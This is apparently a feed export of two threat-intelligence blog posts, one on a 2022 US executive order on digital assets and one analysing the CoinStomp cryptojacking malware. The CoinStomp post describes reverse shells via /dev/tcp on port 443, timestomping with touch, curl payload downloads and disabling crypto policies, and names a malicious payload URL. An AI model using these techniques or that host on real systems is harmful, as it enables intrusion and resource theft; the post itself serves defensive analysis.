crypto currency - X-Industry - Red Sky Alliance2024-03-29T07:58:34Zhttps://redskyalliance.org/xindustry/feed/tag/crypto+currencyDigital Assets: Good or Bad?https://redskyalliance.org/xindustry/digital-assets-good-or-bad2022-03-10T14:37:49.000Z2022-03-10T14:37:49.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}10200055882,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10200055882,RESIZE_400x{{/staticFileLink}}" width="250" alt="10200055882?profile=RESIZE_400x" /></a>The US president signed an executive order (E.O.) on 9 March for “ensuring responsible innovation in digital assets.” The E.O. is designed to, among other things, crack down on the use of cryptocurrency among cybercriminals.<a href="#_ftn1">[1]</a></p>
<p>This long-awaited directive orders federal agencies, including the Department of Justice and the Treasury Department, to coordinate their approach to the booming cryptocurrency sector. Although the order does not lay out specific policy suggestions, it takes aim at consumer protection, financial stability, illicit financing, leadership in global finance, financial inclusion, and responsible innovation.<a href="#_ftn2">[2]</a></p>
<p>Some of the E.O. provisions include the exploration of a US central bank digital currency, as well as an order to the Treasury Department to issue a report on the future of money and payment systems. The order also builds on the US’s counter-ransomware strategy that has been underway for several months, according to a senior administration official.</p>
<p>Last September, the US Treasury Department announced steps it took to disrupt cryptocurrency exchanges that helped criminal networks launder ransoms, as well as increase incident and ransomware reporting to government agencies and law enforcement. The US Department of Justice and Federal Bureau of Investigation (FBI) have also launched cryptocurrency-focused crime units in recent months.</p>
<p>“Digital assets have facilitated sophisticated cybercrime-related financial networks and activity, including through ransomware activity. The growing use of digital assets in financial activity heightens risks of crimes such as money laundering, terrorist and proliferation financing, fraud and theft schemes, and corruption,” the executive order reads. These illicit activities highlight the need for ongoing scrutiny of the use of digital assets, the extent to which technological innovation may impact such activities, and exploration of opportunities to mitigate these risks through regulation, supervision, public-private engagement, oversight, and law enforcement.”</p>
<p>The order comes about two weeks after Russia invaded Ukraine, triggering a wide range of sanctions against the country and its top officials. The order makes no mention of the conflict but does highlight in several places how cryptocurrency could be used to circumvent sanctions in general.</p>
<p>However, the senior official said that cryptocurrency would not be a viable workaround for the aggressive sanctions the US has issued across the Russian economy and Russia’s central bank.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/09/executive-order-on-ensuring-responsible-development-of-digital-assets/">https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/09/executive-order-on-ensuring-responsible-development-of-digital-assets/</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://therecord.media/bidens-cryptocurrency-executive-order-will-help-unify-counter-ransomware-strategy/">https://therecord.media/bidens-cryptocurrency-executive-order-will-help-unify-counter-ransomware-strategy/</a></p></div>A Look into CoinStomp and Cryptojackinghttps://redskyalliance.org/xindustry/a-look-into-coinstomp-and-cryptojacking2022-02-17T14:25:43.000Z2022-02-17T14:25:43.000ZMichael Brousseauhttps://redskyalliance.org/members/MichaelBrousseau<div><p><a href="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10115777254,RESIZE_400x{{/staticFileLink}}" alt="10115777254?profile=RESIZE_400x" width="216" /></a>A new malware family is targeting Asian cloud service providers and using compromised resources to mine cryptocurrency. The malware, CoinStomp, makes use of Timestomping, Command and Control through reverse shells, removal of target system’s cryptographic policies, and references to a previous cryptojacking campaign, Xanthe.</p>
<p>Cryptojacking is the process of compromising machines and using their resources to mine for cryptocurrencies. This attack method has grown popular as an alternative to building sophisticated mining machines which create large overhead costs. By compromising existing machines, attackers can mine crypto without paying for resources. The formula is simple, the more resources an attacker has access to the more crypto they can mine. Cloud service providers are a lucrative target for cryptojacking attackers because CSPs provide solutions including Infrastructure as a Service (IaaS), which provides resources directly to customers. The infrastructure is already in place, all the attacker needs to do is gain access.</p>
<p>Cryptojacking software is designed to run unbeknownst to the victim. To remain undetected CoinStomp uses a technique called Timestomping. Timestomping involves the manipulation of file timestamps. It is frequently used to confuse and mislead digital forensic investigators. Timestomping allows attackers to change the access records and file creation records to help malicious files blend into the target environment. A query based on recently installed files and programs will yield little evidence if the time stamps of the malicious files have been manipulated. On Linux systems a simple “touch” command with the “-t” flag and a made-up timestamp can be used to change the timestamp.</p>
<p>Using reverse shells to contact the Command and Control (C2) servers on port 443, typically used for https traffic, means that this traffic will usually pass seamlessly through the firewall, as outbound https traffic is not normally restricted. The reverse shell uses /dev/tcp/[host]/[port] to create a tcp connection to the designated host on the specified port. Using this command, the attacker can allow for read/write privileges. The malware also uses curl to install additional payloads and provide status updates to the C2 servers.</p>
<p>To allow for successful installation of payloads, CoinStomp uses a command to remove cryptographic policy files. These policies are responsible for allowing or blocking protocols based on the cryptographic protocol version. Usually, insecure protocols will be blocked, but malware often makes use of these protocols for installations and remote connections. By disabling the cryptographic policies CoinStomp can install payloads and make the connections it needs.</p>
<p>CoinStomp uses the Cron scheduler to carry out tasks and immersed in the code is a URL that has been commented out, meaning there is no command to reach the URL. Researchers at Cado Security followed the URL to <a href="http://xanthe.anondns.net:8080/files/fczyo">http://xanthe.anondns.net:8080/files/fczyo</a>. Xanthe was previously a cryptojacking campaign that now has ties to the Abcbotnet and Distributed Denial of Service (DDoS) attacks. The Xanthe cryptojacking campaign made use of a script called fczyo. This may point to a connection to the Xanthe campaign, but it is also possible that it was an attempt to mislead investigators.</p>
<p>The recent discovery of the CoinStomp malware family points out that attackers are knowledgeable about cloud security vulnerabilities, Linux security techniques, and how to mislead digital forensics investigators in the incident response process. Cado Security provided Indicators of Compromise (IoCs) which are pictured below.</p>
<p><a href="{{#staticFileLink}}10115777291,RESIZE_930x{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115777291,RESIZE_710x{{/staticFileLink}}" alt="10115777291?profile=RESIZE_710x" width="600" /></a><a href="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10115778058,RESIZE_180x180{{/staticFileLink}}" alt="10115778058?profile=RESIZE_180x180" width="171" /></a></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p></div>